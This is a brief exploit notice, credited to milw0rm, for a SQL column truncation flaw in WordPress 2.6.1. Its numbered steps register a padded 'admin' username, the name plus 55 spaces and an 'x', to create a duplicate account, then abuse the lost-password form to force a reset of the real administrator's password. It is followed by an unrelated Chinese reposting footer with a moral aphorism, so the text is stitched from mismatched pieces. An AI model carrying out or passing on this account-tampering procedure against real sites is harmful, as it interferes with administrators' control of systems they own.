# found by irk4z[at]yahoo.pl
# homepage: http://irk4z.wordpress.com/
# this is not critical vuln [;
# first, read this discovery:
# http://www.suspekt.org/2008/08/18/mysql-and-sql-column-truncation-vulnerabilities/
# in this hack we can remote change admin password, if registration enabled
# greets: Stefan Esser, Lukasz Pilorz, cOndemned, tbh, sid.psycho, str0ke and all fiends 1. go to url: server.com/wp-login.php?action=register 2. register as: login: admin x
email: your email^ admin[55 space chars]x now, we have duplicated 'admin' account in database 3. go to url: server.com/wp-login.php?action=lostpassword 4. write your email into field and submit this form 5. check your email and go to reset confirmation link 6. admin's password changed, but new password will be send to correct admin email ;/ # milw0rm.com
到此这篇关于WordPress 2.6.1 SQL Column Truncation Vulnerability分析 就介绍到这了。人的美不在外貌、 衣服和发式,而在于它的本身,在于他的心。要是人没有内心的美,我们会常常厌恶他漂亮的外表。更多相关WordPress 2.6.1 SQL Column Truncation Vulnerability分析 内容请查看相关栏目,小编编辑不易,再次感谢大家的支持!